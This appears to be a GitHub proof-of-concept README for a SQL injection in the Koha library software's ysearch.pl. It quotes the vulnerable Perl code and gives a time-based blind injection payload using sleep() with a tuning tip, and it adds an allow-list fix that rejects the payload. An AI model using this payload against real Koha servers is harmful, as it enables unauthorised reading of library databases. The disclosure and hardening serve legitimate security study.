CVE-2023-44961: GitHub - ggb0n/CVE-2023-44961: PoC for CVE-2023-44961
SQL Injection vulnerability in Koha Library Software 23.0.5.04 and before allows a remote attacker to obtain sensitive information via the intranet/cgi-bin/cataloguing/ysearch.pl component.
CVE-2023-44961
PoC for CVE-2023-44961
Description
This is a SQL injection vulnerability in Koha Library Software v23.0.5.04 and earlier that allows a remote attacker to read arbitrary data from the Koha SQL server.
Analysis
The vulnerability is in the intranet/cgi-bin/cataloguing/ysearch.pl file of the intranet (staff) interface:
```perl
# ...
my $query = $input->param('term');
my $table = $input->param('table');
my $field = $input->param('field');

# Prevent from disclosing data
die() unless ($table eq "biblioitems");

# ...

my $dbh = C4::Context->dbh;
my $sql = qq(SELECT distinct $field FROM $table WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ?);
$sql .= qq( ORDER BY $field);
my $sth = $dbh->prepare($sql);
$sth->execute("$query%", "% $query%", "%-$query%");
# ...
```
Only $table is checked (it must equal "biblioitems"); $field is interpolated directly into the $sql string with no validation or keyword filtering at all. We can achieve time-based blind SQL injection by injecting the following payload:
$field = 1 and if((substr(database(),1,1)='k'), sleep(1), sleep(0))
The SQL statement after concatenation is:
```sql
SELECT distinct 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) FROM biblioitems WHERE 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" OR 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" or 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0)) LIKE "" ORDER BY 1 and IF((SUBSTR(database(),1,1)='k'),sleep(1),sleep(0))
```
Because SELECT distinct $field FROM $table WHERE $field LIKE ? OR $field LIKE ? or $field LIKE ? returns the value of $field for every row of $table that satisfies one of the three LIKE conditions, the injected expression is evaluated once per row of $table, so the total delay grows with the row count.
Therefore, to keep the total delay down, set the sleep time to 1/n, where n is the number of rows in $table, i.e. sleep(1/n).
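For contrast, here is one way the lookup can be hardened so that request parameters never reach the SQL text. This is an added example written for this page, not Koha's own code or its upstream patch: the table and column allow-list (the column names are assumed) and the helper names are illustrative.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Allow-listed (table => [columns]) pairs that the autocomplete may search.
# Column names are assumed for this example; a real deployment would list
# the biblioitems columns it actually exposes.
my %ALLOWED = (
    biblioitems => [qw(publishercode place size collectiontitle)],
);

# Return the validated (table, field) pair or die. Both values must match an
# allow-list entry exactly, so no request-controlled text is ever interpolated.
sub validate_columns {
    my ($table, $field) = @_;
    die "unknown table\n" unless defined $table && exists $ALLOWED{$table};
    die "unknown field\n"
        unless defined $field && grep { $_ eq $field } @{ $ALLOWED{$table} };
    return ($table, $field);
}

# Build the same query as ysearch.pl, but only from validated identifiers
# (back-quoted, MySQL/MariaDB style). Only the search term is bound as data;
# the caller passes $sql and @$binds to $dbh->prepare / $sth->execute.
sub build_query {
    my ($table, $field, $term) = @_;
    ($table, $field) = validate_columns($table, $field);
    my $sql = "SELECT DISTINCT `$field` FROM `$table` "
            . "WHERE `$field` LIKE ? OR `$field` LIKE ? OR `$field` LIKE ? "
            . "ORDER BY `$field`";
    my @binds = ("$term%", "% $term%", "%-$term%");
    return ($sql, \@binds);
}

# Constructed requests: a legitimate lookup, then the sleep() payload above.
my ($sql, $binds) = build_query('biblioitems', 'publishercode', 'Pen');
print "$sql\n  binds: @$binds\n";

my $payload = "1 and if((substr(database(),1,1)='k'), sleep(1), sleep(0))";
eval { build_query('biblioitems', $payload, '') };
print "rejected: $@";    # the payload is refused before any SQL is built
```

With the allow-list in place, the field parameter is compared against known column names rather than interpolated, so a non-identifier value such as the payload is rejected with a die() instead of being sent to the database.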
PoC
To trigger the SQL injection vulnerability here, first ensure that there is data in the biblioitems table. We can add data through the following URL:
http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/addbiblio.pl
I have added a piece of data here:
Test our SQL statements on the command line:
It can be seen that with one row in the biblioitems table and the sleep set to 1 second, the actual delay is 3 seconds.
Following this approach, a PoC can be constructed for testing:
Access the following URL to trigger it:
http://koha_ip:intranet_port/cgi-bin/koha/cataloguing/ysearch.pl
As shown in the figure, my database name is koha_mykoha.